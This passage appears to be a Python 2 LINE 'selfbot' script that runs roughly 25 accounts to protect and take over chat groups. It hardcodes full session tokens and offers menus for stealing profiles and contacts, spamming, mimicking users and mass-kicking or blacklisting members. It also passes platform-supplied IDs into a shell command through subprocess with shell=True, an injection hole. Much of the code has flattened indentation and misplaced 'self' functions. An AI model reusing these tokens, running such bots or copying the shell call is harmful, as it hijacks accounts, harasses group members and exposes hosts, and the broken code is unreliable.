k19.login(token="EnBE2HmeIFFfM91ZTaX7.25Cn7zT2U0ATdXa1ZX81LW.IbylRjW82hYufs9i/2yOn5xZIqx/U4RsDgqs1s+Twmc=")#1.2
k19.loginResult()
k20 = LINETCR.LINE()
#k20.login(qr=True)
k20.login(token="En4MSMmqBVw9S5nHq9J4.FUQk+BmD8RC8M0fTjjKnDa.k0xznzgTbCrl24foktcYx23YKrGljzkdg4KYZm4zhJ4=")#1.2
k20.loginResult()
satpam1 = LINETCR.LINE() #
satpam1.login(token="En9ziqocK4BfIGXWJAvf.h7/acorCwJWn0bikcs3GJW.OzgPssOBQsT+ewcOWpxW6RhhKjWCVnSXYRH5bnp286Y=")#satpam
#satpam1.login(qr=True)
satpam1.loginResult()
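# NOTE: the next line aliases k19 and k20 to k18, discarding the two logins made
# above -- presumably deliberate (e.g. dead accounts), but worth flagging.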
k19 = k20 = k18
print "login success bos"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
+-------------
¦ ? =====[WAHYUDI]===== ??t ?
¦-------------
¦ Owner : ? =====[WAHYUDI]===== ?
¦-------------
¦ ?]·?·Menu For Public·?·[?
¦+------------
¦¦[•]Help
¦¦[•]Key
¦¦[•]Mimin
¦¦[•]Creator
¦¦[•]Time
¦¦------------
¦¦[•]Say....
¦¦[•]Wkwkwk/Wkwk/Wk
¦¦[•]Hehehe/Hehe/He
¦¦[•]Galau
¦¦[•]You
¦¦[•]Hadeuh
¦¦[•]Please
¦¦[•]Haaa
¦¦[•]Lol
¦¦[•]Hmmm/Hmm/Hm
¦¦[•]Welcome
¦¦[•]Woy
¦¦------------
¦¦[•]Wiki
¦¦[•]Lyric
¦¦[•]Instagram
¦¦[•]Music
¦¦[•]Youtube
¦¦[•]Vidio
¦¦------------
¦¦[•]Bc
¦¦[•]Up
¦¦[•]Berapa besar cinta
¦¦[•]Apakah
¦¦[•]Siapakah cewek
¦¦[•]Siapakah cowok
¦¦[•]Adakah
¦¦[•]Cakepkah
¦¦------------
¦¦[•]T-eng
¦¦[•]T-japan
¦¦[•]T-thai
¦¦[•]T-id
¦+------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
+-------------
"""
Keyowner ="""
+-------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
¦-------------
¦ Owner : ? =====[WAHYUDI]===== ?
¦-------------
¦ ?]·?·Menu For Admin·?·[?
¦+------------
¦¦[•]Kick ...
¦¦[•]Invite (by mid)
¦¦[•]Undang (Invite by kontak)
¦¦[•]Tarik/Jepit (Invite by kontak)
¦¦[•]Adminlist
¦¦[•]Bot Add @
¦¦[•]Spam... (spam on 10 tes)
¦¦[•]Bot? (cek kontak bot)
¦¦[•]Cancel (cncl undngn trtunda)
¦¦[•]clean invites
¦¦[•]clear invites
¦¦------------
¦¦[•]Message change:...
¦¦[•]Message add:...
¦¦[•]Message
¦¦[•]Comment:...
¦¦[•]Add comment:...
¦¦------------
¦¦[•]Jam on/off
¦¦[•]Change clock
¦¦[•]Jam Update
¦¦------------
¦¦[•]Status (cek status room)
¦¦[•]Cctv
¦¦[•]Intip
¦¦[•]Toong
¦¦[•]Nk
¦¦[•]Tajong
¦¦[•]Vkick
¦¦[•]Emak/Abah
¦¦[•]Kill
¦¦[•]Absen/Respon
¦¦------------
¦¦[•]Ifconfig
¦¦[•]System
¦¦[•]Cpu
¦¦[•]Kernel
¦¦[•]Debug speed
¦¦[•]Bot speed
¦¦[•]Speed respon
¦¦[•]Sp turunin
¦¦[•]Sp naikin
¦¦[•]Turun lagi
¦¦[•]Spbot
¦¦[•]Sp asli
¦¦[•]Speedbot
¦¦[•]Speed
¦+------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
+-------------
"""
Setgroup ="""
+-------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
¦-------------
¦ Owner : ? =====[WAHYUDI]===== ?
¦-------------
¦ ?]·?·Menu For Admin·?·[?
¦+------------
¦¦[•]Cancel
¦¦[•]Buka qr/Open qr
¦¦[•]link open
¦¦[•]Tutup qr/Close qr
¦¦[•]link close
¦¦[•]Rejectall (reject semua invite)
¦¦[•]Protect:hight/low
¦¦[•]Auto blockqr:off/on
¦¦[•]Namelock:on/off
¦¦[•]Blockinvite:on/off
¦¦[•]Joinn on/off (kick protect join)
¦¦[•]Cancel on/off(cncl all undngan)
¦¦[•]Qr on/off (protect qr)
¦¦[•]Contact On/off
¦¦[•]Join on/off (auto join bot)
¦¦[•]Gcancel:on/off (invite grup)
¦¦[•]Leave on/off
¦¦[•]Share on/off
¦¦[•]Add on/off
¦¦[•]Cancelall (canccel all invite)
¦¦[•]Comment off/on
¦¦[•]Backup:on/off
¦¦[•]Mode on
¦¦------------
¦¦[•]Info Group
¦¦[•]ginfo
¦¦[•]Group id
¦¦[•]TL:....
¦¦[•]Gn
¦¦[•]LG
¦¦[•]LG2
¦¦[•]group list
¦¦------------
¦¦[•]My mid
¦¦[•]Mid Bot
¦¦[•]Bot restart
¦¦[•]Turn off bots
¦¦[•]Allbio: (ganti bio stat bot)
¦¦[•]Myname: (ganti nama bot)
¦¦------------
¦¦[•]Banlist
¦¦[•]Cek ban
¦¦[•]Kill ban
¦¦[•]Blacklist @
¦¦[•]Banned @
¦¦[•]Mid @"
¦¦[•]Unban @
¦¦[•]Ban
¦¦[•]Unban
¦¦------------
¦¦[•]Steal group pict
¦¦[•]Steal cover @
¦¦[•]Midpict:..
¦¦[•]Steal pict
¦¦[•]Steal bio
¦¦[•]Steal mid
¦¦[•]Steal contact
¦¦[•]Mimic on/off
¦¦[•]Targetlist
¦¦[•]Mimic target
¦¦[•]Target @
¦¦[•]Del target @
¦¦[•]copy @
¦¦[•]Backup
¦¦------------
¦¦[•]Spamcontact @
¦¦[•]GBc
¦¦[•]Pm cast
¦¦[•]Bot like
¦¦------------
¦¦[•]moleh
¦¦[•]Kabur all
¦¦[•]Kabur
¦¦[•]Bot kadieu
¦¦[•]Asupka:
¦¦[•]Invite me
¦¦------------
¦¦[•]Remove all chat
¦¦[•]Admin add @ (by tag)
¦¦[•]Admin remove @
¦¦[•]Cleanse
¦¦[•]Ready op
¦¦[•]Greet
¦+------------
¦??Hanya Utk Owner/Admin??
¦-------------
¦ ? ? =====[WAHYUDI]===== ??t ? ?
+-------------
"""
KAC=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15,k16,k17,k18,k19,k20]
DEF=[ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15,k16,k17,k18,k19,k20]
kicker=[satpam1]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Emid = k1.getProfile().mid
Fmid = k2.getProfile().mid
Gmid = k3.getProfile().mid
Hmid = k4.getProfile().mid
Imid = k5.getProfile().mid
Jmid = k6.getProfile().mid
Kmid = k7.getProfile().mid
Lmid = k8.getProfile().mid
Mmid = k9.getProfile().mid
Nmid = k10.getProfile().mid
Omid = k11.getProfile().mid
Pmid = k12.getProfile().mid
Qmid = k13.getProfile().mid
Rmid = k14.getProfile().mid
Smid = k15.getProfile().mid
Tmid = k16.getProfile().mid
Umid = k17.getProfile().mid
Vmid = k18.getProfile().mid
Wmid = k19.getProfile().mid
Xmid = k20.getProfile().mid
Smid1 = satpam1.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,Kmid,Lmid,Mmid,Nmid,Omid,Pmid,Qmid,Rmid,Smid,Tmid,Umid,Vmid,Wmid,Xmid]
induk=["u6b34b703cbc5fc83cd1e5b6832a05352"]
Creator=["u3e21520910fc9780c9d4944146dd8508","u6b34b703cbc5fc83cd1e5b6832a05352"]
admin=["u3e21520910fc9780c9d4944146dd8508","u6b34b703cbc5fc83cd1e5b6832a05352","ub573e7ff77d03c5bd9d2eaefbc9a695f",mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,Kmid,Lmid,Mmid,Nmid,Omid,Pmid,Qmid,Rmid,Smid,Tmid,Umid,Vmid,Wmid,Xmid] #Krisna,kris,
owner=["u3e21520910fc9780c9d4944146dd8508","u6b34b703cbc5fc83cd1e5b6832a05352"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"""Terima Kasih Sudah Menambahkan Aku Jadi Teman
» ? =====[WAHYUDI]===== ??t ? Bot Protect «
>>? ? =====[WAHYUDI]===== ??t ? ?<<
» ? =====[WAHYUDI]===== ??t ? «
» SelfBot «
????????? ??:
? ? =====[WAHYUDI]===== ??t ? ?
? ? =====[WAHYUDI]===== ??t ? ?
? ? =====[WAHYUDI]===== ??t ? ?
Idline: http://line.me/ti/p/yudi_std02""",
"lang":"JP",
"comment":"??aµt?l??€ By??\n?º°°°?? t?a? ? =====[WAHYUDI]===== ??t ? ??º°°°?(^?^)\naµt?l??€ by yudi ??? »»» http://line.me/ti/p/yudi_std02 «««",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"namelock":True,
"Backup":False,
"AutoKick":True,
"Mimic":False,
"pname":True,
"qr":True,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":True,
"protectionOn":True,
"Protectcancel":True,
"winvite":False,
"winvite2":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
# The displayName/statusMessage/pictureStatus copy below originally appeared once
# per account (cl, ki, kk, kc, ks, k1..k20); KAC lists those accounts in the same
# order, so a single loop reproduces the same end state.
for acc in KAC:
    contact = acc.getProfile()
    backup = acc.getProfile()
    profile = acc.getProfile()
    backup.displayName = contact.displayName
    backup.statusMessage = contact.statusMessage
    backup.pictureStatus = contact.pictureStatus
    profile.displayName = contact.displayName
    profile.statusMessage = contact.statusMessage
    profile.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
    '''
    Upload an image via the given Imgur client. Relies on module-level `album`
    and `image_path` being defined elsewhere before this is called.
    '''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
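# e.g. yt('lofi beats') -> ['youtu.be/<video-id>', ...] scraped from the search
# results page (fragile by nature: it depends on YouTube's markup staying the same).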
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
    # NOTE: relies on a module-level `messageReq` counter that is not defined in
    # this file; the constructed Message is counted but never actually sent here.
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def MENTION(to,nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nama:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[COMMAND] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
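# The helpers below take `self` despite being module-level functions -- they look
# pasted from a LINE client class and are not callable as-is. Note also that
# `sendMessage` is defined several times in this file; the last definition wins.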
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
        'size': os.path.getsize(path),  # avoid leaking an open file handle
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendAudio(self, to_, path):
M = Message(to=to_, text=None, contentType = 3)
M.contentMetadata = None
M.contentPreview = None
M2 = self.Talk.client.sendMessage(0,M)
M_id = M2.id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
        'size': os.path.getsize(path),  # avoid leaking an open file handle
'type': 'audio',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://obs-sg.line-apps.com/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload audio failure.')
return True
def sendImageWithURL(self, to_, url):
    # randint was never imported; use the imported random module instead
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
    if r.status_code == 200:
        # write in binary mode (mirrors sendAudioWithURL); 'w' would corrupt the image
        with open(path, 'wb') as f:
            r.raw.decode_content = True
            shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendAudioWithURL(self, to_, url):
    # randint was never imported; use the imported random module instead
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download Audio failure.')
try:
self.sendAudio(to_, path)
except Exception as e:
print e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n·" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "·" + Name + " ?"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
    # NOTE: the original compared `string == command` and never used the prefix
    # list (the loop variable even shadowed it). Assuming the prefixes were meant
    # to be applied; the "???:" entries are mojibake and are left as-is.
    prefixes = ["+","@","/",">",";","^","%","$","^","???:","???:","???:","???:"]
    for prefix in prefixes:
        for command in commands:
            if string == prefix + command:
                return True
    return False
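# e.g. with the prefix handling above, cms(msg.text, ['help', 'Help']) returns
# True for '/help', '>help', '@Help', and so on.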
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ? ' + Name
wait2['ROM'][op.param1][op.param2] = '? ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
                    wait2['readMember'][op.param1] += "\n· " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
                    wait2['ROM'][op.param1][op.param2] = "· " + Name
                    # `msg` is undefined inside bot(); op.param1 is the group id
                    wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
                    # Try each account in turn until one can fetch the group.
                    for _c in [cl, ki, kk, kc, ks, k1]:
                        try:
                            G = _c.getGroup(op.param1)
                            break
                        except:
                            continue
G.name = wait['pro_name'][op.param1]
                    # Restore the protected name with whichever account succeeds.
                    for _c in [cl, ki, kk, kc, ks, k1]:
                        try:
                            _c.updateGroup(G)
                            break
                        except:
                            continue
if op.param2 in ken:
pass
else:
                        # Kick the renamer with the first account that manages it.
                        for _c in [ki, kk, kc, ks, k1]:
                            try:
                                _c.kickoutFromGroup(op.param1, [op.param2])
                                break
                            except:
                                continue
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
                    if op.param2 in Bots:
                        pass
                    elif op.param2 in admin:
                        pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
                if op.param2 in Bots:
                    pass
                elif op.param2 in admin:
                    pass
else:
try:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel??")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?\nKk Bukan Admin\nJadi Aku Cancel??")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
            # The original source repeated the same two-line membership check
            # roughly six hundred times: for every account's mid and every
            # possible inviter it called acceptGroupInvitation. The
            # table-driven loop below preserves that behaviour: each account
            # accepts an invite addressed to it when the inviter is the
            # Creator or any of the other linked accounts.
            bot_pairs = [
                (mid, cl), (Amid, ki), (Bmid, kk), (Cmid, kc), (Dmid, ks),
                (Emid, k1), (Fmid, k2), (Gmid, k3), (Hmid, k4), (Imid, k5),
                (Jmid, k6), (Kmid, k7), (Lmid, k8), (Mmid, k9), (Nmid, k10),
                (Omid, k11), (Pmid, k12), (Qmid, k13), (Rmid, k14), (Smid, k15),
                (Tmid, k16), (Umid, k17), (Vmid, k18), (Wmid, k19), (Xmid, k20),
            ]
            for invited_mid, client in bot_pairs:
                if op.param3 in invited_mid:
                    if op.param2 in Creator:
                        client.acceptGroupInvitation(op.param1)
                    for inviter_mid, _ in bot_pairs:
                        if inviter_mid is not invited_mid and op.param2 in inviter_mid:
                            client.acceptGroupInvitation(op.param1)
            #--------------------------------------------------------
if op.type == 13:
            # Auto-join: the same block was repeated for every account, so it
            # is collapsed into one loop. Two fixes are folded in: the
            # original `op.param2 in Bots or owner` tested the truthiness of
            # `owner` rather than membership (so it was always true whenever
            # `owner` was non-empty), and the Nmid block reused k9 where every
            # other mapping in this script pairs Nmid with k10.
            autojoin_pairs = [
                (mid, cl), (Amid, ki), (Bmid, kk), (Cmid, kc), (Dmid, ks),
                (Emid, k1), (Fmid, k2), (Gmid, k3), (Hmid, k4), (Imid, k5),
                (Jmid, k6), (Kmid, k7), (Lmid, k8), (Mmid, k9), (Nmid, k10),
            ]
            for bot_mid, client in autojoin_pairs:
                if bot_mid in op.param3:
                    if wait["autoJoin"] == True:
                        if op.param2 in Bots or op.param2 in owner:
                            client.acceptGroupInvitation(op.param1)
                        else:
                            client.rejectGroupInvitation(op.param1)
                    else:
                        print "autoJoin is Off"
#--------------------------------------------------------
if op.type == 17:
    if wait["Protectjoin"] == True:
        # Let bots, admins and owners join; kick anyone else immediately.
        if op.param2 in Bots or op.param2 in admin or op.param2 in owner:
            pass
        else:
            try:
                random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                cl.sendText(op.param1, "Protect Join is on, Boss\nTurn it off first if you want people to join\nJoin on/off")
            except:
                random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                cl.sendText(op.param1, "Protect Join is on, Boss\nTurn it off first if you want people to join\nJoin on/off")
#------Joined User Kick start------#
if op.type == 32: # Whoever cancels an invitation gets kicked
    if wait["Protectcancel"] == True:
        # Bots, admins and owners may cancel invitations; everyone else is kicked.
        # The original message also contained a broken "\K" escape where "\n" was meant.
        if op.param2 in Bots or op.param2 in admin or op.param2 in owner:
            pass
        else:
            random.choice(KAC).sendText(op.param1, "Don't cancel the invite...!!!\nYou're no admin, and no owner either\nKick time ??")
            random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
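# NOTE: op.type 19 = NOTIFIED_KICKOUT_FROM_GROUP. With AutoKick on, the kicker
# is counter-kicked by a random client from KAC, the victim is re-invited
# (unless blacklisted), and the kicker is added to the blacklist.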
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
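# NOTE: The guard below runs when one of the bots itself is kicked (its mid
# appears in op.param3): the next two clients in the rotation kick the
# attacker, a neighbour client reopens the group ticket, the kicked bot
# rejoins by ticket, and the attacker is blacklisted.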
botMids = [mid, Amid, Bmid, Cmid, Dmid, Emid, Fmid, Gmid, Hmid, Imid, Jmid, Kmid, Lmid, Mmid, Nmid, Omid, Pmid, Qmid, Rmid, Smid, Tmid, Umid, Vmid, Wmid, Xmid]
botClients = [cl, ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]
for i in range(len(botMids)):
    if botMids[i] in op.param3:
        if op.param2 in Bots:
            # A fellow bot did the kick; don't retaliate. The original
            # `if op.param2 in Bots: pass` had no else, so bots were hit too.
            continue
        victim = botClients[i]
        helper = botClients[(i + 1) % len(botClients)]
        backup = botClients[(i + 2) % len(botClients)]
        try:
            helper.kickoutFromGroup(op.param1,[op.param2])
            backup.kickoutFromGroup(op.param1,[op.param2])
        except:
            try:
                random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
            except:
                print ("Could not kick: client restriction or target no longer in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
        if op.param2 not in wait["blacklist"] and op.param2 not in Bots:
            wait["blacklist"][op.param2] = True
        # Reopen the group ticket with a surviving client so the kicked bot
        # can rejoin, then lock the ticket again.
        G = helper.getGroup(op.param1)
        G.preventJoinByTicket = False
        helper.updateGroup(G)
        Ti = helper.reissueGroupTicket(op.param1)
        victim.acceptGroupInvitationByTicket(op.param1,Ti)
        X = victim.getGroup(op.param1)
        X.preventJoinByTicket = True
        victim.updateGroup(X)
        if op.param2 not in wait["blacklist"] and op.param2 not in Bots:
            wait["blacklist"][op.param2] = True
#--------------------------------------------------------
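# NOTE: The op.type 19 handlers below protect admins, the owner and the main
# account: if a non-bot kicks one of them, the kicker is kicked back, the
# victim is re-invited (or rejoins by ticket), and the kicker is blacklisted.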
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in admin or op.param3 in owner:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in admin or op.param3 in owner:
if op.param2 not in Bots:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
k1.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param2 not in Bots:
if op.param3 in mid:
if op.param2 not in Bots:
try:
